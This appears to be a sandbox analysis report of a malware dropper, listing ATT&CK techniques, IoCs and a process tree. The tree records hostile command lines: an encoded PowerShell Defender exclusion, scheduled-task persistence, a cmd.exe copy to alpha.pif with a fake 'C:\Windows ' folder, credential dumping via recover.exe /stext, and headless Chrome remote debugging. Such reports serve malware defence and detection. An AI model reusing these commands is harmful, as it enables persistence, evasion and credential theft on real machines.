Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	notyhkkadaw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jonobatric2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CONVERTER.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	believe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	thawdtyh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uptime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	casse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BYKNLOLR1L9ZCZTG4KA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csrss.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	noypjksdaw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crossings.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 7 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4768	PING.EXE
4876	cmd.exe
1220	cmd.exe
4376	PING.EXE
5812	PING.EXE
11928	GoogleUpdate.exe
9360	GoogleUpdate.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5864	cmd.exe
7348	netsh.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral2/files/0x00050000000271c3-13233.dat	nsis_installer_1
behavioral2/files/0x00050000000271c3-13233.dat	nsis_installer_2

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
10124	timeout.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2952	WMIC.exe
7320	wmic.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3636	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
7404	systeminfo.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
8708	taskkill.exe
5424	taskkill.exe
3804	taskkill.exe
5468	taskkill.exe
1652	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	nyoilsafkjawd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	crossings.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
5812	PING.EXE
4768	PING.EXE
4376	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4924	schtasks.exe
7944	schtasks.exe
5056	schtasks.exe
5612	schtasks.exe
8676	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3880	svchost.exe
3880	svchost.exe
3880	svchost.exe
3880	svchost.exe
3660	notyhkkadaw.exe
3660	notyhkkadaw.exe
3660	notyhkkadaw.exe
3660	notyhkkadaw.exe
3476	svchost.exe
3476	svchost.exe
3476	svchost.exe
3476	svchost.exe
3636	ipconfig.exe
3636	ipconfig.exe
5180	rdha.exe
5180	rdha.exe
5180	rdha.exe
5180	rdha.exe
5432	fontdrvhost.exe
5432	fontdrvhost.exe
5432	fontdrvhost.exe
5432	fontdrvhost.exe
4744	cscript.exe
4744	cscript.exe
4744	cscript.exe
3636	ipconfig.exe
3636	ipconfig.exe
3636	ipconfig.exe
4744	cscript.exe
4744	cscript.exe
4744	cscript.exe
5492	BYKNLOLR1L9ZCZTG4KA.exe
5492	BYKNLOLR1L9ZCZTG4KA.exe
4652	powershell.exe
4652	powershell.exe
4972	RegSvcs.exe
4972	RegSvcs.exe
4652	powershell.exe
5492	BYKNLOLR1L9ZCZTG4KA.exe
5492	BYKNLOLR1L9ZCZTG4KA.exe
2832	noypjksdaw.exe
2832	noypjksdaw.exe
2832	noypjksdaw.exe
2832	noypjksdaw.exe
5492	BYKNLOLR1L9ZCZTG4KA.exe
5492	BYKNLOLR1L9ZCZTG4KA.exe
5492	BYKNLOLR1L9ZCZTG4KA.exe
4288	believe.exe
4288	believe.exe
5336	recover.exe
5336	recover.exe
1136	kent.exe
1136	kent.exe
5424	recover.exe
5424	recover.exe
5336	recover.exe
5336	recover.exe
3636	ipconfig.exe
3636	ipconfig.exe
3636	ipconfig.exe
4744	cscript.exe
4744	cscript.exe
4744	cscript.exe
4744	cscript.exe

Suspicious behavior: MapViewOfSection 21 IoCs

pid	Process
376	mackobatric2.1.exe
3880	svchost.exe
2340	jonobatric2.1.exe
3476	svchost.exe
3880	svchost.exe
3880	svchost.exe
3476	svchost.exe
3476	svchost.exe
1212	cssos.exe
3636	ipconfig.exe
4744	cscript.exe
3636	ipconfig.exe
4744	cscript.exe
1136	kent.exe
1136	kent.exe
1136	kent.exe
3636	ipconfig.exe
3636	ipconfig.exe
3316	app.exe
1820	firefox tsm.exe
3096	iexplore.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3812	New Text Document mod.exe
Token: SeDebugPrivilege	3880	svchost.exe
Token: SeDebugPrivilege	3148	g.exe
Token: SeDebugPrivilege	3476	svchost.exe
Token: SeDebugPrivilege	3636	ipconfig.exe
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeDebugPrivilege	3412	x.exe
Token: SeDebugPrivilege	4744	cscript.exe
Token: SeDebugPrivilege	4972	RegSvcs.exe
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeDebugPrivilege	5492	BYKNLOLR1L9ZCZTG4KA.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeIncreaseQuotaPrivilege	4652	powershell.exe
Token: SeSecurityPrivilege	4652	powershell.exe
Token: SeTakeOwnershipPrivilege	4652	powershell.exe
Token: SeLoadDriverPrivilege	4652	powershell.exe
Token: SeSystemProfilePrivilege	4652	powershell.exe
Token: SeSystemtimePrivilege	4652	powershell.exe
Token: SeProfSingleProcessPrivilege	4652	powershell.exe
Token: SeIncBasePriorityPrivilege	4652	powershell.exe
Token: SeCreatePagefilePrivilege	4652	powershell.exe
Token: SeBackupPrivilege	4652	powershell.exe
Token: SeRestorePrivilege	4652	powershell.exe
Token: SeShutdownPrivilege	4652	powershell.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeSystemEnvironmentPrivilege	4652	powershell.exe
Token: SeRemoteShutdownPrivilege	4652	powershell.exe
Token: SeUndockPrivilege	4652	powershell.exe
Token: SeManageVolumePrivilege	4652	powershell.exe
Token: 33	4652	powershell.exe
Token: 34	4652	powershell.exe
Token: 35	4652	powershell.exe
Token: 36	4652	powershell.exe
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeDebugPrivilege	4288	believe.exe
Token: SeDebugPrivilege	5424	recover.exe
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeShutdownPrivilege	3536	Explorer.EXE
Token: SeCreatePagefilePrivilege	3536	Explorer.EXE
Token: SeShutdownPrivilege	4012	Chrome.exe
Token: SeCreatePagefilePrivilege	4012	Chrome.exe
Token: SeShutdownPrivilege	4012	Chrome.exe
Token: SeCreatePagefilePrivilege	4012	Chrome.exe
Token: SeShutdownPrivilege	4012	Chrome.exe
Token: SeCreatePagefilePrivilege	4012	Chrome.exe
Token: SeShutdownPrivilege	4012	Chrome.exe
Token: SeCreatePagefilePrivilege	4012	Chrome.exe
Token: SeShutdownPrivilege	4012	Chrome.exe

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
376	mackobatric2.1.exe
376	mackobatric2.1.exe
2340	jonobatric2.1.exe
3536	Explorer.EXE
3536	Explorer.EXE
3536	Explorer.EXE
2340	jonobatric2.1.exe
1212	cssos.exe
1212	cssos.exe
1476	casse.exe
1476	casse.exe

Suspicious use of SendNotifyMessage 8 IoCs

pid	Process
376	mackobatric2.1.exe
376	mackobatric2.1.exe
2340	jonobatric2.1.exe
2340	jonobatric2.1.exe
1212	cssos.exe
1212	cssos.exe
1476	casse.exe
1476	casse.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3660	notyhkkadaw.exe
2832	noypjksdaw.exe
5356	fireballs.exe
3316	app.exe
3096	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3812 wrote to memory of 3148	3812	New Text Document mod.exe	83
PID 3812 wrote to memory of 3148	3812	New Text Document mod.exe	83
PID 3812 wrote to memory of 376	3812	New Text Document mod.exe	84
PID 3812 wrote to memory of 376	3812	New Text Document mod.exe	84
PID 3812 wrote to memory of 376	3812	New Text Document mod.exe	84
PID 376 wrote to memory of 3880	376	mackobatric2.1.exe	87
PID 376 wrote to memory of 3880	376	mackobatric2.1.exe	87
PID 376 wrote to memory of 3880	376	mackobatric2.1.exe	87
PID 376 wrote to memory of 3880	376	mackobatric2.1.exe	87
PID 3536 wrote to memory of 3636	3536	Explorer.EXE	88
PID 3536 wrote to memory of 3636	3536	Explorer.EXE	88
PID 3536 wrote to memory of 3636	3536	Explorer.EXE	88
PID 3812 wrote to memory of 3660	3812	New Text Document mod.exe	89
PID 3812 wrote to memory of 3660	3812	New Text Document mod.exe	89
PID 3812 wrote to memory of 3660	3812	New Text Document mod.exe	89
PID 3812 wrote to memory of 3412	3812	New Text Document mod.exe	90
PID 3812 wrote to memory of 3412	3812	New Text Document mod.exe	90
PID 3812 wrote to memory of 2340	3812	New Text Document mod.exe	93
PID 3812 wrote to memory of 2340	3812	New Text Document mod.exe	93
PID 3812 wrote to memory of 2340	3812	New Text Document mod.exe	93
PID 2340 wrote to memory of 3476	2340	jonobatric2.1.exe	94
PID 2340 wrote to memory of 3476	2340	jonobatric2.1.exe	94
PID 2340 wrote to memory of 3476	2340	jonobatric2.1.exe	94
PID 2340 wrote to memory of 3476	2340	jonobatric2.1.exe	94
PID 3536 wrote to memory of 4744	3536	Explorer.EXE	100
PID 3536 wrote to memory of 4744	3536	Explorer.EXE	100
PID 3536 wrote to memory of 4744	3536	Explorer.EXE	100
PID 3636 wrote to memory of 4456	3636	ipconfig.exe	101
PID 3636 wrote to memory of 4456	3636	ipconfig.exe	101
PID 3636 wrote to memory of 4456	3636	ipconfig.exe	101
PID 3812 wrote to memory of 864	3812	New Text Document mod.exe	103
PID 3812 wrote to memory of 864	3812	New Text Document mod.exe	103
PID 864 wrote to memory of 5180	864	readerupdate2.exe	104
PID 864 wrote to memory of 5180	864	readerupdate2.exe	104
PID 864 wrote to memory of 5180	864	readerupdate2.exe	104
PID 5180 wrote to memory of 5432	5180	rdha.exe	106
PID 5180 wrote to memory of 5432	5180	rdha.exe	106
PID 5180 wrote to memory of 5432	5180	rdha.exe	106
PID 5180 wrote to memory of 5432	5180	rdha.exe	106
PID 5180 wrote to memory of 5432	5180	rdha.exe	106
PID 3812 wrote to memory of 1212	3812	New Text Document mod.exe	107
PID 3812 wrote to memory of 1212	3812	New Text Document mod.exe	107
PID 3812 wrote to memory of 1212	3812	New Text Document mod.exe	107
PID 3660 wrote to memory of 5492	3660	notyhkkadaw.exe	108
PID 3660 wrote to memory of 5492	3660	notyhkkadaw.exe	108
PID 3660 wrote to memory of 5492	3660	notyhkkadaw.exe	108
PID 1212 wrote to memory of 4972	1212	cssos.exe	109
PID 1212 wrote to memory of 4972	1212	cssos.exe	109
PID 1212 wrote to memory of 4972	1212	cssos.exe	109
PID 1212 wrote to memory of 4972	1212	cssos.exe	109
PID 4744 wrote to memory of 1164	4744	cscript.exe	111
PID 4744 wrote to memory of 1164	4744	cscript.exe	111
PID 4744 wrote to memory of 1164	4744	cscript.exe	111
PID 3812 wrote to memory of 3172	3812	New Text Document mod.exe	115
PID 3812 wrote to memory of 3172	3812	New Text Document mod.exe	115
PID 3812 wrote to memory of 3172	3812	New Text Document mod.exe	115
PID 5492 wrote to memory of 5908	5492	BYKNLOLR1L9ZCZTG4KA.exe	117
PID 5492 wrote to memory of 5908	5492	BYKNLOLR1L9ZCZTG4KA.exe	117
PID 5492 wrote to memory of 5908	5492	BYKNLOLR1L9ZCZTG4KA.exe	117
PID 5908 wrote to memory of 4652	5908	cmd.exe	119
PID 5908 wrote to memory of 4652	5908	cmd.exe	119
PID 5908 wrote to memory of 4652	5908	cmd.exe	119
PID 3812 wrote to memory of 2832	3812	New Text Document mod.exe	116
PID 3812 wrote to memory of 2832	3812	New Text Document mod.exe	116

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3076
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:5432
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:3996
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:8584
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:8552

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3536
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  - Downloads MZ/PE file
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3812
- - C:\Users\Admin\AppData\Local\Temp\a\g.exe
    "C:\Users\Admin\AppData\Local\Temp\a\g.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3148
- - C:\Users\Admin\AppData\Local\Temp\a\mackobatric2.1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\mackobatric2.1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:376
  - - C:\Windows\SysWOW64\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\mackobatric2.1.exe"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:3880
- - C:\Users\Admin\AppData\Local\Temp\a\notyhkkadaw.exe
    "C:\Users\Admin\AppData\Local\Temp\a\notyhkkadaw.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3660
  - - C:\Users\Admin\AppData\Local\Temp\BYKNLOLR1L9ZCZTG4KA.exe
      "C:\Users\Admin\AppData\Local\Temp\BYKNLOLR1L9ZCZTG4KA.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5492
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C powershell -EncodedCommand "PAAjAE0ATQBUAGkATwAzAGMAUgA1AHMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBjAHQAcAB4ADcAcQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAdwBTAHYAagBLADMATwA1AGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwB3ADAAeAA3ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
        5⤵
        Power Settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5908
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAE0ATQBUAGkATwAzAGMAUgA1AHMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBjAHQAcAB4ADcAcQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAdwBTAHYAagBLADMATwA1AGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwB3ADAAeAA3ACMAPgA="
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4652
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        5⤵
        
        PID:3944
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5378" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5320
- - C:\Users\Admin\AppData\Local\Temp\a\x.exe
    "C:\Users\Admin\AppData\Local\Temp\a\x.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3412
- - C:\Users\Admin\AppData\Local\Temp\a\jonobatric2.1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\jonobatric2.1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\SysWOW64\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\jonobatric2.1.exe"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:3476
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 720
      4⤵
      Program crash
      PID:6040
- - C:\Users\Admin\AppData\Local\Temp\a\readerupdate2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\readerupdate2.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:864
  - - C:\Users\Admin\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe
      "C:\Users\Admin\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5180
- - C:\Users\Admin\AppData\Local\Temp\a\cssos.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cssos.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1212
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Local\Temp\a\cssos.exe"
      4⤵
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:4972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 720
      4⤵
      Program crash
      PID:5112
- - C:\Users\Admin\AppData\Local\Temp\a\csrss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\csrss.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\9766.cmd""
      4⤵
      System Location Discovery: System Language Discovery
      PID:3664
    - - C:\Windows\SysWOW64\esentutl.exe
        
        C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
        5⤵
        
        PID:4112
    - - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2996
    - - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\36168.cmd""
      4⤵
      System Location Discovery: System Language Discovery
      PID:1776
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 10
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4768
  - - C:\Users\Admin\Links\dajivhqI.pif
      C:\\Users\\Admin\\Links\dajivhqI.pif
      4⤵
      PID:7144
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7144 -s 12
        5⤵
        Program crash
        
        PID:6432
- - C:\Users\Admin\AppData\Local\Temp\a\noypjksdaw.exe
    "C:\Users\Admin\AppData\Local\Temp\a\noypjksdaw.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:2832
- - C:\Users\Admin\AppData\Local\Temp\a\Service.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Service.exe"
    3⤵
    - Executes dropped EXE
    PID:5260
- - C:\Users\Admin\AppData\Local\Temp\a\fireballs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fireballs.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5356
- - C:\Users\Admin\AppData\Local\Temp\a\kent.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kent.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:1136
  - - C:\Windows\SysWOW64\recover.exe
      C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\zwnmvulqghxpcffgch"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5336
  - - C:\Windows\SysWOW64\recover.exe
      C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\jztwwfwruppcmttstrislx"
      4⤵
      Accesses Microsoft Outlook accounts
      System Location Discovery: System Language Discovery
      PID:4840
  - - C:\Windows\SysWOW64\recover.exe
      C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\utypwxhlixihozpwdcvlocgdk"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5424
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      PID:4012
    - - C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x1fc,0x220,0x22c,0x7ffe67fccc40,0x7ffe67fccc4c,0x7ffe67fccc58
        5⤵
        
        PID:1072
    - - C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1476,i,5756934087598356260,1339469132540372653,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1468 /prefetch:2
        5⤵
        
        PID:464
    - - C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1932,i,5756934087598356260,1339469132540372653,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1916 /prefetch:3
        5⤵
        
        PID:1940
